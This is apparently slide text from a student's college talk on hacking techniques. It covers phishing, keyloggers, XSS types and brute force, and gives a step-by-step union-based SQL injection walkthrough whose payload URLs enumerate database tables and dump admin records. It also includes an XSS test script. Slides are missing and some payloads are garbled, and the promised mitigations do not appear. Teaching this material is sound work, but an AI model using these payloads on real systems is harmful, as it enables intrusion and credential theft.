I presented this in my graduation college in-front of my classmates wherein i described various types os hacking techniques used by the "Bad Guys" and also how to mitigate them.
5. Some Hacking techniques to hack a Facebook or a Gmail
account :
1. Phishing
2. Key Loggers
3.Trojans/Backdoors
6. What is Phishing ?
It's a way of hacking where a hacker tricks his victim by making him/her login to a
website which is made to look identical to the legitimate one.After a victim login, this
fake website will acquire his information (username and password) and send it to a
hacker.
10. SQL Injection
•SQL Injection is a method of injecting SQL queries into the
website,by injecting our malicious queries hacker can easily
1.By pass the authentication
2.Grab the Structure of the database
3.Grab the sensitive data
11. •Basically we will divide our SQL
injection Methods into different types,
1.Authentication Bypass
2.Union Based Injection
SQLi methods
12. Authentication Bypass
To login to the admin login.php page,whenever thea dmin
will enter the admin id and password,a query will executed
on admin login table,the query will look somewhat like,
select * from admin login where admin id=‘<value>’ and
pass=‘<value>’;
i.e. : select * from admin login where admin id=‘admin’ and
pass=‘admin pass
13. SQL injection is a code injection technique, used to attack data-
driven applications, in which malicious SQL statements are
inserted into an entry field for execution (e.g. to dump the
database contents to the attacker).
Union Based Injection
20. 3) Union select 1,2,3,4--
:http://www.site.com/product.php?id=4union
select1,2,3,4--
The visible column number is 2 so we can replace.
21. 4) Check version OR database OR user by applying,
union select 1,database(),3,4 --
http://www.site.com/product.php?id=4 union
select1,database(),3,4--
22. 5) To see the table names,
http://www.site.com/product.php?id=5 union select
1,2,table_name,4 from information_schema.tables --
23. 6) Find the column names of the table
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from
information_schema.columnswhere
table_name=‘tbl_admin’ –
24. 7) Get the data from the database.
http://www.site.com/products.php?id=5 union select 1,2,adminid,4
from admin --
25. 1)A type of vulnerability typically found inWeb applications.
2)Enables to inject client-side script into Web pages viewed
by other users.
26. 1. DOM-Based Attack:-
A DOM-Based attack is a more advanced attack where the
attackers payload (malicious script) is executed as a result
of modifying the DOM Environment in the slave's browser
by the original client side script, this causes the client side
code to run in an unexpected manner.
27. 2. Persistent XSS Attack:-
A persistent XSS attack is a method in which the
attackers payload is permanent to the
servers code and will remain there for every user to see
until a server admin removes it.
28. 3. Non-Persistent XSS Attack:-
A non-persistent XSS attack is a method in which the
attackers payload is not permanent, meaning it doesn't
effect the servers internal code. An example of this would
be a link that has a Non-Persistent attack embedded into
it.
29. What we need to perform it?
I.A vulnerable website
Let’sAttack
II.A textbox (may be searchbox or any text box) in the site
30. let’s try putting in the most known, BASIC query of all time.
Code:-
<script>alert(“XSS”)</script>
31. We will get the result of our attack by the XSS code like a
popup box… Like this…
32. Any password can be cracked using Brute-force attack.
Brute-force attacks try every possible combinations of
numbers, letters and special characters until the
right password is match.
BruteForce Attack
33. Credits : 1) Lucideus Tech
2) Tyagi Sir
3)Aman Sir
4) Andy
5) Ofcourse me :P